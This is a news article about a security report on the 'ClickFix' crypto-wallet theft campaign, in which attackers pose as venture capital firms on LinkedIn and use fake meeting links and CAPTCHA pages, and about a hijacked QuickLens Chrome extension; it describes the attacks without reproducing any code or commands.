ClickFix Crypto Attack Escalates: Hackers Impersonate VCs, Lure to Meeting Links, and Hijack QuickLens Browser to Steal Wallets

On March 3rd, cybersecurity researchers disclosed that a cryptocurrency attack method called “ClickFix” is rapidly evolving. Recently, hackers have been disguising themselves as venture capital firms to contact target users on social media platforms and hijacking devices through malicious browser extensions to steal crypto wallet data and account information.

Cybersecurity organization Moonlock Lab released a report stating that attackers created multiple fake investment firm identities, including SolidBit, MegaBit, and Lumax Capital, and sent collaboration invitations to crypto industry professionals via LinkedIn. Once victims accept the communication, hackers provide a so-called online meeting link, usually disguised as Zoom or Google Meet.

When users click these links, they are directed to a simulated verification page containing a “I’m not a robot” CAPTCHA similar to Cloudflare. Clicking it automatically copies malicious commands to the user’s clipboard and prompts them to paste a so-called verification code into their computer terminal. Executing these commands causes malicious programs to run on the device, triggering the ClickFix attack.

Moonlock Lab pointed out that the danger of this attack method lies in its use of social engineering to induce users to actively execute malicious code, bypassing traditional security defenses. Because there are no obvious malicious downloads or exploit behaviors, many security systems find it difficult to detect the risk in time.

Investigations revealed that an account named Mykhailo Hureiev had contacted multiple users as a co-founder of SolidBit Capital and is considered one of the early scam contacts. However, researchers noted that this attack activity is highly modular; once an identity is exposed, the attacker quickly switches to new fake identities to continue operations.

Meanwhile, hackers also expand their attack scope by hijacking browser extensions. John Tuckner, founder of security firm Annex Security, stated in the report that a Chrome extension called QuickLens was recently found to contain malicious scripts and was removed from the app store. Originally, this plugin allowed users to search with Google Lens within their browser, but after a developer change on February 1st, a new version containing malicious code was released within two weeks.

The report states that this extension has about 7,000 users and is used to scan crypto wallet data, seed phrases, and other sensitive information on devices. Additionally, the malicious scripts can read Gmail emails, YouTube account data, and login or payment information from web forms.

Security researchers pointed out that the ClickFix attack has been spreading since 2024 and has affected multiple sectors, including manufacturing, retail, public utilities, and energy industries. As attackers continue to refine their social engineering tactics, the risk of wallet theft targeting crypto asset users is also significantly increasing.